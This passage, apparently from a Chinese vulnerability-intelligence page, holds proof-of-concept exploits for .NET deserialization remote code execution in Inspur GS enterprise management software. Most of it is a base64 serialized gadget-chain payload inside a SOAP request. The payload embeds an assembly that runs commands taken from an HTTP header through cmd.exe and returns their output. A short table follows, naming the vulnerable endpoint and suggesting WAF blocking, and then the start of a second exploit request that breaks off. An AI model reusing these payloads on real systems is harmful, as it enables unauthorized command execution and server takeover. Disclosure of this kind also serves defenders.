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ZQBrd3V3YWNwdwBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0hlYWRlcnMAZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABzZXRfQXJndW1lbnRzAHNldF9SZWRpcmVjdFN0YW5kYXJkT3V0cHV0AHNldF9SZWRpcmVjdFN0YW5kYXJkRXJyb3IAc2V0X1VzZVNoZWxsRXhlY3V0ZQBTdGFydABTeXN0ZW0uSU8AU3RyZWFtUmVhZGVyAGdldF9TdGFuZGFyZE91dHB1dABUZXh0UmVhZGVyAFJlYWRUb0VuZABXcml0ZQBGbHVzaABFbmQARXhjZXB0aW9uAAAAD2MAbQBkAC4AZQB4AGUAAAdjAG0AZAAABy8AYwAgAAAAAAA2IZXU/G1oT7AM+EyvNpdOAAi3elxWGTTgiQMgAAEEIAEBCAiwP19/EdUKOgQAABIRBCAAEhUEIAASGQQgABIhBCABAQ4EIAASJQQgABIpBCABDg4FAAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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ZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=</printOpByte>
<printInfoByte></printInfoByte>
</SavePrintFormatAssign>
</soap:Body>
</soap:Envelope>
浪潮GS企业管理软件多处 .NET反序列化RCE漏洞poc2
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetChildFormAndEntityList xmlns="http://tempuri.org/">
<baseFormID>string</baseFormID>
<baseEntityID>string</baseEntityID>
